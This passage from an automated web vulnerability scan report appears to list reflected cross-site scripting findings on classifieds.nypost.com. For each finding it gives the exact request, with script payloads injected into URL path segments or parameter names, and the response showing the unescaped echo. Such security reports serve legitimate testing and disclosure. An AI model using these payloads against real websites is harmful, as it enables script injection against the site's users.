P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=92afa041b3ea2471b6a3571b6b151996; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=95127b5a9b8f19ca470fccd840497fc4; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BMDRFQjdDODRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing98452"-alert(1)-"777efafcfa1/rent/apartment/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.129. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851ae"><script>alert(1)</script>1c7a28410d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing851ae"><script>alert(1)</script>1c7a28410d9/rent/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:17 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=9a1ec2d606ef9a4217b314b63ce5e085; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=5cebecd73600e2dc6b8c1976837b347a; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CQjNCREM4MDRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing851ae"><script>alert(1)</script>1c7a28410d9/rent/apartment/" />
...[SNIP]...

1.130. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b443f"><script>alert(1)</script>8c392b4b01f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rentb443f"><script>alert(1)</script>8c392b4b01f/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=bcadb1d7fe1457d766d3a1b415f427ce; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=ac590ce48349d97c6bd214da4ec048ae; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DOEVEQTAxQjRENTBBQjM2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rentb443f"><script>alert(1)</script>8c392b4b01f/apartment/" />
...[SNIP]...

1.131. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c600f"-alert(1)-"631c9dfd9db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/rentc600f"-alert(1)-"631c9dfd9db/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=5482e30b7b9520e50113f93adb559204; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=155c1216dec18cdafb4a8da22a88354e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CMDQ4Nzk5RTRENTBBQjM3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/rentc600f"-alert(1)-"631c9dfd9db/apartment/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.132. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b58ca"-alert(1)-"8e650569f43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housingb58ca"-alert(1)-"8e650569f43/sale/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=8952cebcccddb05b0b492258310e65a7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=331826cc99afffbcfd3192501f85945d; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BMTRFMDhGMzRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housingb58ca"-alert(1)-"8e650569f43/sale/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.133. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af3af"><script>alert(1)</script>2383bc7b4a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housingaf3af"><script>alert(1)</script>2383bc7b4a2/sale/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=961547882d20431006d8d55ec5c46ae3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=f6ff5b4fb7e61d07ff00b5c57df4f4bb; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DRjNEQUNFOTRENTBBQjJD; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housingaf3af"><script>alert(1)</script>2383bc7b4a2/sale/" />
...[SNIP]...

1.134. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743bf"><script>alert(1)</script>52416edc729 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/sale743bf"><script>alert(1)</script>52416edc729/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:17 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=7241134d9ecf06edd355e33e951acb8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=99a9d42109e00a1cc41bed07afbb7f90; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BRjk3OEI1MjRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/sale743bf"><script>alert(1)</script>52416edc729/" />
...[SNIP]...

1.135. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b04a"-alert(1)-"4c9628f7613 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/sale6b04a"-alert(1)-"4c9628f7613/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=7d33cd61f00586135bbc01d6d97811c5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=07f8cec03af577aa1f8a737e2a4722b3; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FQ0REMDVFNzRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/sale6b04a"-alert(1)-"4c9628f7613/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.136. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8051f"><script>alert(1)</script>ed0505c2ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job8051f"><script>alert(1)</script>ed0505c2ef/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:17 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=2fcc6d8406f32b4ddedd916b82be58de; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=dfc2d0d6bde6021f66f784fa161ab08e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GNjY2RTk2RTRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/job8051f"><script>alert(1)</script>ed0505c2ef/" />
...[SNIP]...

1.137. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aabde"-alert(1)-"983a4a707fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jobaabde"-alert(1)-"983a4a707fc/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=3725793ad5984417584a0b67ffa68f4c; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=6c8b26b153ab3ddfad61fb4837579c0d; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FRDg3MzhCQTRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds jobaabde"-alert(1)-"983a4a707fc/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.138. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e7c0"-alert(1)-"9d75c7c2cd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post1e7c0"-alert(1)-"9d75c7c2cd1/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:39 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=df493d631799b3ae71a3f47afed2e73f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=34ce2d0beacf8aab4c6971699d3feea3; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GNTJCQjU1OTRENTBBQjQ3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM1OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds post1e7c0"-alert(1)-"9d75c7c2cd1/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.139. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fce6"><script>alert(1)</script>8fbf846dde5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post1fce6"><script>alert(1)</script>8fbf846dde5/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=9c639fd8a2bc4f978acdc8be6e356431; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=5729656fe7e1ac9653ac58e5ac096a07; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GNEMyMDNCQTRENTBBQjQ2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM1ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/post1fce6"><script>alert(1)</script>8fbf846dde5/" />
...[SNIP]...

1.140. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05d5"-alert(1)-"d62825c243a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post/?f05d5"-alert(1)-"d62825c243a=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:32:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=bf5746dabc2d75a50e0a9be6b3f39b8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=e3e0b9b8e19d41b51d5cfd5512137451; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1EMkIxOThCNTRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
t-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-post-_-post-_--_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-";
cmSetProduction();
